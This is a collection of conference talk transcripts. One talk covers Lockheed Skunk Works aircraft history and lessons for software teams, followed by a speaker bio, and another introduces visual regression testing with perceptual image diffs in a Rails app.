only had 18 months to two years of operational viability out of this plane before Russia figured out a way to shoot it down. And so they needed another answer. They needed the replacement for the U2 almost as soon as they put it into service. And so they designed a plane that would be faster and higher. They wanted a plane that would fly at 100,000 feet and cruise at at least Mach 2, which are crazy numbers. And so in response, Skunkwork started working on the Archangel series of design studies. This is an early model of the Archangel. And by the 11th design revision, it's starting to look a little bit more familiar. Probably think I'm about to tell you about the SR-71, but you're wrong. The plane I'm about to tell you about is the Lockheed A-12. This plane is the predecessor to the SR-71. Most people don't know it existed. The technological leap that this plane represents is almost impossible to comprehend. It's designed to fly 5 miles higher than the U2 at 90,000 feet. And it's designed to fly 4 times faster than the U2 at Mach 3.25. Now, the fastest plane America has built to this date is still the F-104 Starfighter. And it can fly at Mach 2 for about a minute, minute and a half before it either runs out of gas or the engine start overheating. This plane was intended to fly at Mach 3.25 for an hour and a half to two hours at a stretch. Now, performing at those extremes meant almost everything the team knew about traditional airplane design didn't apply. And the CIA generously gave them 22 months to figure it out. To coincide with the expected end of operational viability of the U2. Now, aluminum was the material that they would usually build an airplane out of. It's still one of the most common materials for airframes. The problem with aluminum is that it loses its structural integrity at about 300 degrees Fahrenheit. The calculations that they did indicated that this plane would be 800 degrees Fahrenheit at the nose and 1200 degrees Fahrenheit at the engine cowlings. So the aluminum, if they built the plane out of aluminum, the aluminum would literally just fold up. It would have no structural integrity at those temperatures. They considered building it out of stainless because that's the obvious option when you need steel that's going to hold up under high heat, but that would make the plane too heavy to get to the altitudes it needed to get to. And so Henry Combs, the primary structural engineer on the A12 project, suggested they consider titanium. Now he had built the engine exhausts of the F104 out of titanium, and it had worked great. The only problem with building this plane out of titanium is that nobody knew how to build something this big out of titanium. The biggest thing that they had manufactured out of it was engine nozzles. Still, Kelly Johnson was favorable on the proposal. He said any material that can cut our gross weight by half is damn tempting even if it's going to drive us nuts in the process. And he was right about it driving them nuts. They ordered the first batch of titanium in to see what they could do with it, and they realized they had no idea how to extrude it. They had no idea how to weld it. They had no idea how to rivet it. They had no idea how to drill it. The drill bits that they used on aluminum would literally shatter when they tried to drill through titanium with them. On top of that, the U.S. supplier that they ordered these preliminary batches from didn't have enough capacity to supply them in the quantities they needed for the number of airplanes they thought they were going to build. So they asked the CIA for help, and the CIA, through a series of dummy companies and anonymous third parties, set up a supply chain for the leading exporter of titanium of the day, the Soviet Union. So the very metal to build the A-12 came from the same country it was intended to spy on. The extreme operating environment required adaptation everywhere in the plane. Early calculations they did also indicated the plane, when it got up to cruise altitude and cruise temperature, would stretch by two to three inches. It would literally get longer because of how fast it was going. So everything in the plane had to cope with that. The control cables were made of L-geloy, which is the alloy used to make watch springs because it maintains its tensile strength at very high temperatures. The engine nozzles were made of hastaloy X, which is a nickel alloy, and they chose hastaloy X because they knew it could withstand the 3400 degree Fahrenheit that the afterburners were expected to produce, and it could withstand those temperatures for the hour and a half to two hours that they would be running on afterburner. Off-the-shelf electronics wouldn't function because of the temperature, neither would greases, oils, hydraulic fluids, even fuels. They had to come up with new answers for all of these things because of the operating environment of this plane. They had a custom fuel develop that wouldn't be volatile at the expected range of operating temperatures. The only problem was you couldn't get the stuff to burn. It had such a high flash point that it literally wouldn't ignite. So you had to do this. Inject the engine with triethyl borane, which is really, really nasty stuff that spontaneously combusts with this bright green flash when you expose it to the atmosphere. That was the only way to get this high flash point temperature fuel to ignite. One of the biggest challenges was propulsion, and that's why Kelly Johnson put 32-year-old Ben Rich as the lead propulsion engineer on this plane. Young guy, not a lot of experience, but Kelly Johnson trusted him. This is one of the few places that they actually were able to adapt something off the shelf for this plane. They picked Pratt & Whitney's J58 turbojet engine. Pratt & Whitney had built this engine for a Mach 2 Navy fighter that had been canceled. Pratt & Whitney had about 700 hours of testing on this engine and really wanted to find a place to use it. So they were willing to go to the extremes that skunkworks needed them to go to to make it work in this plane. They had to modify the engine to make it be able to operate continuously on afterburner and in the thin air at 90,000 feet. But that wasn't the major innovation of the propulsion of this plane. Major innovation is the cone that you see right there. Now that cone actually moves back into the body of the engine by about 26 inches when it gets up to cruise velocity. To understand why, you have to understand how jet engines work. Jet engines work on compression. There's a wide opening at the front of the engine that scoops in as much air as possible and over a series of compressors, it compresses it into a very compact stream that pushes the plane as fast as possible. You can think about what happens when you put your thumb over the nozzle on a garden hose. It's the same effect. So these engine cones, as it got up to Mach 3, would move back into the engine 26 inches. And they were responsible for 70% of the thrust of this engine at cruise velocity. The afterburners contributed another 25%. The engine itself only contributed about 5% of thrust. So this engine essentially converted from standard jet to ramjet in the middle of operating. Air entering this engine at minus 65 at 90,000 feet would be 800 degrees Fahrenheit before it hit the combustion stage of the engine. This is a crazy amount of innovation. But what's just as interesting to me about this plane is the things that Skunk Works chose not to solve. There was no fuel tank sealant that would work over the entire operating range expected of this aircraft. And so this plane would literally sit on the tarmac dripping fuel. You can see the puddle under this plane. That's jet fuel. They just didn't care. It didn't matter. It got up to supersonic speed. The fuel tanks would seal. It was no big deal. The other interesting thing is the plane can't even start itself. Now, to start these massive jet engines, I already told you about the triathlon borane. But the other thing that you have to do to get the combustion to be self-sustaining is you have to get the turbines spinning at 4500 RPM. You have to do that before you inject the triathlon borane and get the fuel burning. They thought about adding a starter motor to the plane, but it would take a very large starter motor to get the turbine turning as fast as it needed to. So they did this instead. This is the AG-330 start cart, or the Buick, as the ground crews called it. And the reason they called it that is because contained in this start cart are two Buick V8 Wildcat engines. And they would physically couple this thing to the starter shaft of these massive turbines, crank the two V8 engines up to full throttle, get the turbine turning 4500 RPM and light it off. That's a crazy hack. The ground crews said that the hangar literally would sound like a stock car race when they were starting this plane up. But it didn't cost them any altitude. There were only two things that mattered in building the A12. It needed to go very fast and needed to do so very high. It went five miles higher and four times faster than the U2. And on April 30, 1962, one year and 100% over budget, Skunk Works gave the CIA what they wanted. This is a picture of the A12's first flight. Dripped fuel, couldn't even start the engines without crazy chemicals and a couple of V8 engines. It actually couldn't even take off with a full load of fuel. It had to hit a tanker almost as soon as it took off because those tiny wings wouldn't generate enough lift if you put a full load of fuel in the plane. But it didn't matter. They spent their money and their time on the things that did matter. The titanium construction, the propulsion system, they just hacked their way around the rest. This plane went Mach 3.25 at 90,000 feet and over flew every hostile territory in the world. And it holds the distinction of being the only military aircraft never have been shot down despite 3,500 missions over some of the most contested territory in the world and having hundreds of missiles launched at it. After building 15 of the A12 for the CIA, the Air Force requested a two-seater variant with twice as much payload. That plane was the A12's far more famous younger brother, the SR-71. It holds about every speed and altitude record there is. It holds the record for sustained altitude at 85,069 feet. Now keep in mind these are official records to determine over an official course. The plane almost certainly flew higher than this in combat. It holds the record of sustained speed at 2,193.2 miles an hour. It's about Mach 3.3. Now Brian Schull in his book, Sled Driver, when he tells a bunch of stories about flying this plane, and one of them he tells is outrunning missiles in Libya. Mo Marqaddafi had launched everything in his battery at Brian's plane and he just kept pushing the plane faster and faster and faster because he knew if he could just make it to his turn and get out of the country, he could miss these missiles. Well his reconnaissance officer in the back seat once they made this turn had to remind him to slow the plane back down. When he looked at the speedometer, they were going over Mach 3.5. So we know this plane would go well faster than this speed limit. To give you some context on just how fast this is, the muzzle velocity of a.22 caliber rifle bullet is 2,046 miles an hour. So at cruise speed, the SR-71 Blackbird can literally claim to be faster than a speeding bullet. It also set a bunch of speed records over courses. It could fly from New York to London in an hour and 55 minutes. The Concorde on a good day with a heavy tailwind could do it in.252. It could fly from Los Angeles to Washington in one hour and four minutes. And over the course of setting that record, it set another one that's one of my favorites because it's really easy to wrap your head around. It flew from St. Louis to Cincinnati in eight minutes and 32 seconds. Now, if you want to drive that in your car, it'll take you about five hours and 16 minutes. It's just an incredibly fast plane, and it's probably going to hold these records forever. With the invention of high-resolution satellite photography and unmanned aerial vehicles, there's really no reason for us to ever build a plane like this again. It's just a crazy amount of innovation, especially when you consider it was built in the 60s. It would be an innovative plane if you built it today. Well, the SR-71 was Kelly Johnson's crowning achievement. In 1975, he hit Lockheed Martin's mandatory retirement age of 65, and he passed the reins on to this man, his protege, Ben Rich. This is the same Ben Rich that had designed the propulsion system for the A-12 at 32 years of age. Now, Ben took over Skunk Works at kind of a tumultuous time. The U.S. appetite for defense spending was at an all-time low after Vietnam. There just wasn't much energy to spend money on new technology. Lockheed had attempted in the wake of this to re-enter the commercial aviation market with this plane, the L-1011 TriStar, and had lost about $2 billion in the process. And keep in mind, these are $1975. So, Rich had to find significant new work, and he had to find it fast, or he was going to have to let go most of his most expensive and most experienced engineers. Meanwhile, the Cold War continued. Leonid Brezhnev, who had been the Russian premier for most of the Cold War, would be in power for another eight years or so. The Soviet Union had invested around 300 billion rubles in developing radar and surface-to-air missiles like this SA-5 that were far more advanced than any attack capability the Americans had. We couldn't fly against this. To give you some context on this, in the 18-day Yom Kippur War, which was largely a proxy war between the U.S. and Russia, Israel lost 109 U.S.-built U.S.-trained pilot aircraft against these SA-5 missiles that were operated by largely untrained, largely undisciplined Syrian and Egyptian troops. The Soviet technology was so good it didn't even require an experienced operator to be able to shoot down our best technology. And to maintain the mutually assured destruction that had kept the U.S. and Russia from all-out nuclear war throughout the Cold War, the U.S. needed to develop something that could pierce these defenses, but ideas were in short supply. Until Dennis Overholzer, a 36-year-old math and radar expert on the Skunkwerk staff, walked into Ben Rich's office and tossed this document on his desk, the method of edge waves and the physical theory of diffraction. Sounds like a really engaging read, right? Well, it was so engaging that it had actually been published by Peter Ofimsev, excuse me, who was the chief scientist at the Moscow Institute of Radio Engineering nearly a decade earlier before the Air Force finally got around to translating it. I just didn't think there was anything of tactical value in here. They hadn't prioritized it. Overholzer, however, found something on the last page that seemed very substantial to him. It was a method for calculating the radar cross-section of the edge and the surface of a wing and come up with an accurate number for just how visible that wing would be on radar. You have to understand that accurately determining how visible a plane would be on radar in these days was largely impossible without building a scale model and sticking it on top of a pole on a radar range, which you can see the A12 here. Folks like Overholzer, who knew something about the science behind radar, could make some educated inferences about what might make a difference to observability, but there were no hard and fast rules, and there was no way to know for certain until you actually tested it. Stealth had long been theorized as something that might be possible, but it was always written off as too difficult, too expensive to try. But in Ofamself's document, Overholzer was convinced that he had found the formulas that would let them predict observability ahead of time and empirically design for it. So he asked Ben Rich to let him start on some software. Five weeks later, Dennis Overholzer walked into Ben Rich's office with a sketch of this thing, which the Lockheed technical staff would quickly take to calling the hopeless diamond, because they didn't think they'd ever be able to get it to fly. Now, in the preliminary radar range test that Lockheed did in Palmdale, the radar operator in trying to scope the radar in on this model thought that maybe the model had fallen off of the pole on the test range. And so he asked Ben Rich to stick his head out the window and see if the plane was still on top of the pole. So Ben did that. About the time Ben stuck his head out the door, along comes a crow and lands on the plane. And the radar operator goes, oh, never mind, I've got it now. So you couldn't see the plane, but you could see a crow on the radar. And at that moment, Ben Rich knew they were onto something big. Around this time, DARPA was holding a competition for design of a theoretical stealth aircraft. Lockheed and Northrop won the first phase of the competition. They were given 1.5 million to refine their concepts and build 38-foot models that were then going to be tested at the Air Force's most sensitive and sophisticated radar range in White Sands, New Mexico. That's what you see in this picture, Lockheed's 38-foot model. The only problem was that when they got this out to the radar range to test it, the model was so good that the only thing they could see on the radar was the pole. Now, the Air Force had always assumed that the pole on their radar ranges was invisible. They had never had this problem before. And they didn't know what to do about it. So Denys Silverholster went to work, and he made him a better pole, too. So, and that's what you see here. The pole cost somewhere around $500,000 in and of itself, but it was no longer visible on radar, and they could test the plane. They came up with a really interesting way to test the plane to see just how visible it was on radar. They knew that they could take a ball bearing and calculate the theoretical responsiveness of a ball bearing. They knew what a ball bearing should look like on radar. So they decided that they would glue ball bearings to the front of the plane and see how small they could get before they saw the airplane. This is where they started. This is a two-inch ball bearing. They couldn't see the plane. They went smaller and smaller and smaller and smaller until they got to this. That is a one-eighth-inch ball bearing. Most of you probably can't see that. It's smaller than a BB. They still couldn't see the plane. They only saw the ball bearing. So, needless to say, Lockheed won the competition pretty easily. The only thing that was left to be seen is, A, can you get this thing in the air? And B, once you do, is it still stealthy once you add things that the model doesn't have, like engines and air intakes and a pilot? The Air Force wanted two prototype planes in 14 months, and Skunk Works agreed. And 14 months later, they came up with this, the half blue. Now, if this thing looks like it might fly to you, it's just because your brain has been conditioned to think that things that look like this are airplanes, because you've seen enough pictures of the stealth fighter over the years. Everybody at Lockheed was still sort of in doubt until they actually saw it in the air. Now, how did they get this thing built in 14 months? Well, not invented here was not a thing at Skunk Works. This thing is literally off of the surplus shelf. It uses the flight control computer from the F-16, navigation from the B-52, the pilot seat from the F-16, the heads-up display from the F-18, engines from a T2B trainer, and the list goes on and on and on. The only original thing about this plane is the outer skin. The biggest thing that they had to solve, obviously, is aerodynamics. This thing is actually unstable in all three axes of flight. That means that it is pitch unstable, it is yaw unstable, and it's roll unstable. The only plane that they had deployed that was unstable in any axis of flight was the F-16, and it was only pitch unstable. It didn't have to contend with all three. So, they set the flight computer up to determine what inputs they needed to send to the control surfaces to make this thing fly. They would take the pilot's input and sum it with the things that the computer knew that it needed to do, and that would be what went to the control surfaces. The early nickname for this plane was the Woblin Goblin, because it took them a while to dial in that software. But true to form, they got it to fly. Most test flights were at night to avoid prying eyes, so this is one of the few pictures we have of this plane in the air. That's why it's such a terrible picture. But now that it could fly, they needed to see if it could live up to the promise of stealthiness. And so they flew it against this, the target acquisition radar from a hot missile battery, the most advanced radar technology that the U.S. had at the time. The plane literally over flew this radar right over top. The radar never picked it up. The missiles never swung into alignment. They just pointed lazily at the mountains off in the distance. And they knew that their plane was a success. It's about five years later that the first F-117 stealth fighter detachment was in operation at Tonapa Test Range Airport. Now Tonapa Test Range is the massive military complex in the Nevada desert that encompasses Area 51. So there's a pretty good chance that a large number of UFO sightings in the late 80s are this thing. The American public didn't find out about this plane until the first night of Operation Desert Storm. The Air Force sent a total of 22 F-117s into Baghdad that night. And privately, they had calculated that they would lose about 30% of those planes. Because Baghdad at that point was more well defended than even Moscow had been at the height of the Cold War. But they didn't lose any planes that first night. As the pilots were flying out of Baghdad and they reestablished radio contact, they realized that everybody was present and accounted for. They didn't lose a single one of these planes over the entirety of Operation Desert Storm. This whole plane is one big hack. They needed it to be invisible on radar. That's all they needed. And they got there. They got really close. They got it to be as visible as basically a BB by basically not caring about aerodynamics at all. And hacking their way around the laws of physics that govern how planes fly. The computers of the day weren't powerful enough to calculate radar reflectivity of curved surfaces. So that's why this thing is made up of a bunch of angular flat surfaces. It had nothing to do with the design of the plane. They didn't have the computers to design stealthy curved surfaces. So they just built a plane that was all straight surfaces. Kelly Johnson had a long standing saying that beautiful planes fly beautifully and nobody at Skunk Works thought this was a beautiful plane. But it didn't matter. It didn't matter that it wasn't a beautiful plane. It did exactly what it was designed to do. So how'd they do it? All of these amazing planes, each of which was groundbreaking in some significant way. There's plenty more that we haven't even talked about. While our story ends the same place it began. A scrappy team of at its peak, 23 designers and 105 fabricators created the P80 around a mocked up engine in 143 days. And that plane was in service for over 40 years. Not much about Kelly Johnson's philosophy of how to build planes changed over the years, even when he passed the reins on to Ben Rich. He was a proponent of prototyping and learning. I tried to find a picture of HAVBLUE and the F117 together on the tarmac. I figured surely it had to be out there. But I started looking at the dates and I realized just how much of a throwaway prototype HAVBLUE was. They had managed to crash both of them before the F117 was ever built. He liked to iterate. You can see here the A12 is on the right and the SR71 is on the left. The A12 could go a little faster and a little higher than the SR71, but it turns out it didn't need to. They revised it to a two-seater with double the payload capacity for the Air Force, gladly trading a bit of altitude and speed for more utility, more mission viability. Kelly also had some general rules about how to run his organization. If you want to know more about those you can Google Kelly's rules and you'll be taken to Kelly Johnson's 14 rules for Lockheed's gunkworks. But I'm going to tell you about a couple of them that are especially applicable to us as software engineers. The first one is that the number of people having any connection with the project must be restricted in an almost vicious manner. Use a small number of good people, 10 to 25 percent compared to the so-called normal systems. At its peak, there were 75 design engineers working on the SR71. To give you some context for that, Boeing used 10,000 engineers to build the 777, and Boeing had the advantage of computer-assisted design software. Lockheed was still doing all their drawings by hand at that point. Kelly Johnson hired smart people into his organization and he trusted them to do good work. But lots of companies run their software engineering organizations like Henry Ford ran his assembly lines. They measure all of the work the way that Henry Ford measured how many cars were produced, how effective a worker was. They set up all sorts of heavy processes to govern what work gets done and when, and they add a new process for every little hiccup. Now, this process has the desired effect. We turn off our brains and we become factory workers for as long as we can stand the boredom. The things we build, though, have more in common with the planes that gunkworks built than they do the cars of Henry Ford. We're knowledge workers building unique software, not assembly line workers putting together widgets. How does this work in practice? Well, Peter Drucker, probably the most prolific writer on management in America, tells the story of a young infantry captain in Vietnam. The reporter asked this infantry captain how in the fog of war he maintained command of his troops. And the commander responded, around here, I'm only the guy who's responsible. If these men don't know what to do when they run into an enemy in the jungle, I'm too far away to tell them. My job is to make sure they know what to do. What they do depends on the situation, which only they can judge. The decision lies with whoever is on the spot. This is how software teams work, whether we acknowledge it or not. You're constantly making decisions as you're writing code. Managers can choose to either trust their teams to make good decisions or they can smother them with process and micromanagement and try to have a hand in every decision that their teams make. Good managers hire smart people and trust them to make good decisions as they write code. But they also focus on enabling them to make good decisions by making sure they understand the context and the overall goals of what they're working on. Kelly Johnson handled this by lightning up his systems. A very simple drawing and drawing release system with great flexibility for making changes must be provided. I told you about this earlier on the P80. He got away from the complex drawing systems that were required elsewhere in Lockheed because his small teams just didn't need them. They didn't need that much process. They were able to get the work done with a much lighter amount of documentation. Now, the slight way process wouldn't have worked at the Lockheed main plant because they were trying to build a far higher volume of airplanes with far less skilled workers. But Kelly Johnson had a small team and he trusted them. Sarah May actually had a really great tweet on this the other day. She said that team pathology is always either hanging onto processes suited to a smaller team or early adopting processes suited to a larger team. It's very true. Ten years ago a friend of mine and I decided to start a boutique software consultancy. So think about the first thing that you would do if you were going to start a boutique software consultancy. It's probably the same thing that we did. We went out and spent a thousand bucks on a Jira license and spent the better part of a week getting it stood up on a VPS so we could track our work. Now, keep in mind it was two of us and we had one client at the time. We didn't last very long. You need enough process so that everyone has the context they need but not so much that people turn off their brains and blindly do what they're told. Your process is there to serve you, not the other way around. This is what Kelly Johnson got so right. He couldn't have delivered all this innovation on his own. It wasn't in his brain but the processes he put in place allowed his teams to set the right priorities and make the right compromises at the right point in time when they made decisions. His most important rule was that there should be only one object to get a good airplane built on time. What made a good airplane? Delivered the value the customer needed. Hit the key specs and compromise wherever necessary to hit those key specs. He was a pragmatist. Every decision he and his team made was around how to deliver the most value in the shortest amount of time for the customer while bringing out the best in his team. Because of the freedom and the trust that he gave his teams and because of how clearly he laid out the goals for each project, they were able to deliver some of the most amazing planes ever built. The U2 landed on terrible landing gear. Pilots said it was the easiest thing in the world to fly from 60,000 feet down to six inches. They hated landing it. But the team decided it was worth it to save the weight in favor of the altitude. And the pilots learned to work around it. It was a good compromise. It was a great hack. The SR-71 is the fastest plane ever built but it couldn't even start itself because it didn't have a starter motor. It would have added too much weight. It sat on the tarmac dripping fuel. They just didn't care. The team spent their time figuring out how to build a plane out of titanium. How to make it go Mach 3.25. And they hacked their way around the other stuff. The F-117 violates every law of aerodynamic design. And they worked around it to make it invisible on radar. It bucks conventional wisdom in almost every way possible because of the trust that Ben Rich put in Denys Overholster. Kelly's and later's Ben's teams had unprecedented input into what they were building. They had incredible freedom and incredible trust from their bosses. You should push for that freedom in your job if you don't already have it. The process that you follow should be the right size for your team. And you should know the most important things about what you're building. You should know the goals so that you can contribute to your project's success beyond just writing code. If that's not the case for you, push back hard, change it. If you're in a leadership role, you have a responsibility to give that freedom to your team. You need to push as many decisions and as much responsibility down to your team as you can. You need to make sure you're clearly communicating the two or three most important things that your team needs to be building at any given time so that like those frontline soldiers in Vietnam, they can make the right decisions based on what they're seeing and the code they're working on at that instant. You have to give them the context to make those decisions and you have to trust them to make the right decisions. If you do these things, if you trust your team to innovate and don't just trust yourself, if you trust your coworkers to build amazing things, there's no telling what amazing stuff you're going to be able to build together. Thanks a lot. Thank you.
|
Nickolas hails from the Breakfast Taco Capital of the World, Austin, TX. When he's not busy eating said tacos, he's VP of Engineering at Wellmatch Health , working with an incredibly talented team of engineers to bring transparency to healthcare pricing. He believes that software engineering is mostly human interaction and he's passionate about building empathetic, compassionate teams.
|
10.5446/31505 (DOI)
|
This is the continuous visual integration talk. Thank you for being here. We got to go, go, go. We have a lot of things to get through. So just a little bit about me to start. My name is Mike Fotinakis. I'm currently the founder of Percy, Percy.io, which is a tool for visual testing. So I'm really excited to share with you some of the things I've learned over the last year about how to test apps pixel by pixel. I'm also the author of two Ruby gems, JSON API serializers, and Swagger blocks. If you use either of those, I'd love to talk to you after, or if you have any questions. Okay, so let's jump right in. So this will come in like three parts, the problem, the general solution, and kind of how it works, and architectures and methodologies, and all the problems that come along with that. So let's start with the problem. So the problem is basically that unit testing itself is kind of a solved problem. We have a lot of different strategies and techniques and technologies for testing the data of our systems, for the behavior of our systems, for the functionality of our systems, and the integration of our systems with other systems, and end-to-end testing our systems, and smoke testing our deployments. And we have a lot of tools and technologies for this, right? But how do you test something like this? So I guess the color of the text has become the color of the button, or the text now has zero opacity, or something's happened, right? And this was fixed by an issue. Or another example, here's a 404 page of an app I used to work on. This is just what it's supposed to look like. It's pretty simple, pretty straightforward. We launched a feature, and then four weeks later, we were told that our 404 page looked like this. Right? You've all seen this, right? And of course, nobody caught this in QA, because no one QA is the 404 page. And this was a simple change. Somebody had just moved a CSS file, everything else worked, but the 404 page was the one that was broken. So then I got fixed, and then the fix looked like this. So the CTA is totally covered up, and it didn't QA the fix on mobile, so you're still continuing to fix. And then I went and pulled slides for this a while back, and looked at the 404 page, and it was broken again. So I reported this to my old team. So this in the business, this is what we call a regression. And specifically, this is a type of visual regression. So how do product teams fix this today? Shout out the answers. Hire more people? Okay. How do you fix these kinds of problems? What? Interns. Interns? Okay. What are the interns doing? They're clicking around a lot. They're what? They're clicking around a lot. What's that called? Behavioral? Exploring. Exploring? I'm looking for a specific word here. QA. Thank you. QA. So QA is the big one. Right? So, and this can be developer QA. This can be you doing QA on your apps. This can be you have QA engineers. Right? QA can mean many things, but part of the job of this is to find these kinds of things before they hit production. Right? Or, you know, that you get issues from your customers and you fix them after. QA is very necessary, but it's also very slow and manual and complicated. Right? And it's also pretty impossible to catch everything. Right? Even in like a medium-sized app with just tens of models, you can have hundreds of flows and thousands of possible page states and permutations and constant feature churn. Right? There's a lot of development that's happening in these apps and you can't catch all of this stuff all the time. So it's also very expensive. Right? So, you know, you're doing manual, human, often engineering hours paying for fixing these kinds of visual regressions. So let's go back to this button problem. And let's, you know, my standard fix to this would be like, can I write a regression test for this? Right? I'm a big TDD person. I love testing. I write tests for basically everything. So, like, let's go try to write a test for this. Right? So here's like an RSpec feature test that, you know, test this part of the app. Right? It does simple things. You just click the home page and then it fills in some text box with a title and it clicks a button, right? And then you expect that the page has new content on the page. So there's a problem here, right? Like this test didn't fail. The button still technically works. It's just visually wrong. Right? And this manifests in tons of different ways. So what am I supposed to do here? Am I supposed to assert that some, like, CSS computed style of the color of the thing or maybe that it has a CSS class applied but that's not really testing the right thing? So I'm just not going to do this, right? And no one's going to do this because no one wants to write a test that's this, like, fragile and inflexible, right? Especially in a developing product. So my normal approach is very useless here. So the problem fundamentally is that pixels are changing, right? But we're often only testing what's underneath. We're testing all of our abstractions on top of those pixels. So this is an important problem because the pixels are the things that your users are actually touching and seeing and interacting with all the time. And to go further than that, even with all of our current testing strategies and methodologies, we still lack confidence in deploys, right? You can have a million unit tests for all the different data changes in the world, but if you move a CSS file or change your CSS, you're going to have to go look at it, right? You're going to have to go check that and test it. So let's move on to the solution to this problem. And I don't like to say that this is the solution. I like to frame this as a solution. This is not the be all end all of all testing strategies that will make your life perfect. But it's sort of a new tool in the toolbox. So the question I like framing is, what if we could see every pixel changed in any UI state in every PR that we make, right? So that basically is like, you know, what could we do if we could test our apps pixel by pixel? So in order to do that, I'm going to introduce a new concept you may or may not be familiar with these. And they're called perceptual disks. They're called PDIS. They're called visual disks. This has been pioneered many times. Brett Slatkin at Google has done quite a bit of work on this on the Google consumer surveys team. You should watch his talk. It's about how he accidentally launched a pink dancing pony to production. And then they ended up having to, like, you know, do this style of testing in order to prevent that from happening. So what is a perceptual diff? A perceptual diff is relatively straightforward, right? Given two images, what's the difference between these two images, right? Like compute the delta between these two images. And that can be this, right? So all the red pixels are the pixels that have changed between these two images without any context about what the image is about, right? So you can compute this basically for any kind of image. So how do we compute these, right? Let's try another example. So shout out the differences in these two side by side. And then we'll show the PDF and see if you're right. Background color on the top. Lost the link. Capital and thumbnails. Danger buttons gone. Right, you got all of them. So this is the PDF, right? And you can immediately see all of the changes in that image without having to sort of sift through it, right? All these pixels that have changed, these are the things that have changed on this page. So PDFs in 30 seconds. Let's go, like, do a PDF. PDFs are pretty straightforward, right? Okay. So I have these two images, just new and old, right? So let's open new and old. Okay. So here are the two images, right? And this is just from the skeleton, like, demo site. So you can see there's some differences in them, but let's go, like, make a PDF and see what that actually is. So I have image magic that a library installed, and I can just use the image magic compare tool and compare old and new, and I'll store the image in diff.png. And I'll have to open diff.png. So cool. We have our first PDF, right? Those are all the pixels that have changed. And by default, it, you know, applies the images underneath and makes it translucent, and you can turn those things off. You can pass a bunch of different flags to this command, to, like, fuzz factor if you don't care that pixels have changed within a certain amount of colors or those kinds of things, right? So computing PDFs themselves are actually relatively straightforward. So here's a couple of PDFs in real life, right? So if you try to figure out the difference between these two, it might take you a second, but the difference in this PDF, you can kind of immediately see that the, do you agree to the terms of view section of this page is gone, right? It just no longer exists. And I kind of love this because this is a test for an error condition, but it's basically like a back end change manifesting as a front end failure, right? This is a Rails form object that somehow has gotten into a weird state that is manifesting as this sort of front end failure. And you might have a test for this, but this form probably doesn't submit now, right? You probably can't actually submit this form. So here's another example. Here's like a normal visual change, this two visual change you might want. Like a new person got added to this page, so the visual diff is, okay, a bunch of things shifted around and got reflowed, and you can sort of go back and forth and be like, okay, I understand that this page has a new thing added to it. So you sort of have to learn how to read PDFs because they can be a little bit noisy, right? So for example, this one, they look the same, but in the footer, and you probably can't read that, but it says like, if type of jQuery not equal undefined slash, you know, something. So this one was somebody added a gem which happens to inject some scripts into the page, and the gem was in a broken state, right? So all of their tests are probably passing, all of everything else is passing, but their footer has some junk in it, right? And you often can't catch these kinds of things without visual tests or, you know, looking at it. Here's just PDF art. I found this in some diffs that I've done, and an image got shifted over just perfectly to create this nice PDF art. Totally useless, but kind of cool. And also a pretty strong signal in PDFs is if there are zero pixels changed, that's really important for you, right? Like in a classic refactor of your app, in a pure refactor, you're not changing anything that somebody's interacting with. All the plumbing's shifting around, you're changing architectures, you're upgrading something, but the actual thing that people are touching or the API that you're touching is not actually changing, right? So having a zero pixel change PDF can be a really strong signal because you get visibility into knowing that nothing has changed in this page, right? I can safely upgrade this thing because everything is remaining the same. And as your app gets bigger and bigger, you want to be able to do those kinds of refactors for your code health, right? So let's go write a visual regression testing system in two minutes. Ready, go. Okay. So I have this app, this is Giffindor, which is if you went to Brandon Hayes' Talk at Rails comp two years ago, this is his app. And Brandon, I don't know if you're in the room, but you probably didn't expect anyone who's going to go back and write tests for your demo app from two years ago, but we're going to do it. So here we go. So here are some, like, feature specs that are written for this app. And they do simple things like you visit a page, you expect that it has some content, you click a dialogue, you expect that the new thing is up. This app has just basic behaviors. It's just a stream of posts, right? And you can upload Gifs. And you can do simple things like you click submit a GIF and it does a jQuery animation that pulls that down. And you can type stuff and there's a validation state, like a bunch of things that we all do all the time, right? So these tests for this are relatively straightforward. So let's just go save a screenshot at the end of this. All I'm doing here is using the Capybara screenshot, save screenshots capabilities, and this works with basically every web driver that you have except for rack tests, but most web drivers support this. So let's save that and let's go run the tests. R is just my bash alias for bundle exec Rspec. So don't let that throw you. And you should all have that, by the way, because you type that all the time. So great, we've run the tests. Let's see. There's a change here, right? So we have a screenshot of what our test looked like in that state, or what our app looked like in that test state, right? And this is kind of what I call a complex UI state, right? You've clicked a button and some jQuery animation is fired in order to open up that top dialog. This is not just a static page that you visited, right? But you'll also notice it doesn't quite look exactly like the page we were looking at, right? This border image is all messed up and there's some other things going on here. So we'll talk a little bit about that later, like why that's actually not totally the same. Okay, so great. So we've saved our old image. Let's change it to new for the new one. And let's go change the background color of this app. So here's the CSS. Let's just change the background color by one pixel, right? And we'll make sure that this other one is saved. We'll go run our tests. Great. So we have an old and a new. Great. Let's compare them. And store it in diff.png. Open up diff.png. Cool. Here's a PDF, right? Like all the background pixels of this page have changed. And you might think of this as just noise, right? But why would anybody care about a background color that you can't see? But I guarantee you that there's a designer in this room who actually would probably want to know if this changes, right? And they want to guarantee that there's a consistent color palette being used and that we developers aren't sort of arbitrarily changing the background shades when we think that that's a new color that we should use, right? There needs to be some consistency there. So I kind of don't discount these kinds of changes just because you can't see them at the eye. That doesn't mean that they're not important. So great, right? Awesome. Let's all do this. So simple uses here are catching visual regressions, right? That's the kind of obvious one. But then if you start thinking about this more, there's a lot of advanced uses for this kind of stuff. Like CSS refactors and deletions is a big one, right? You're all terrified to delete CSS. Yes or no, right? Because it's scary. You don't know where that CSS is used. You don't know what legacy parts of your app are using that CSS. So what if you go add a visual diff test to a visual regression test to your top 50 pages, now go to delete your CSS and see what happens, right? And if you've deleted it and nothing changes on the pages you care about, great. You can probably delete that CSS. Testing style guides, especially testing living style guides is a pretty cool use of this. Safe dependency upgrades. So often your libraries, you know, they're backwards compatible, but they're adding new features. So you want to be able to upgrade your libraries. But upgrading libraries and dependencies is also kind of scary sometimes. And you want to be able to, especially if those libraries are providing front-end dependencies of any sort, if they're providing JavaScript behaviors, if they're providing, if your style guide is in its own gem and you're importing that and you're upgrading style guide versions, like upgrading dependencies safely and having these kinds of visual checks can be really useful. Visual regression testing for emails is an awesome advance use case I've seen. Testing D3 visualization is something I've sort of started experimenting with recently. Because testing D3 is actually kind of hard, right? Like you can kind of test, I'm not like a D3 expert by any means, but you can sort of test like the data transformations you're making, like how your inputs transform your outputs and sort of how you expect the D3 is going to be able to visualize that. But wouldn't it be nice 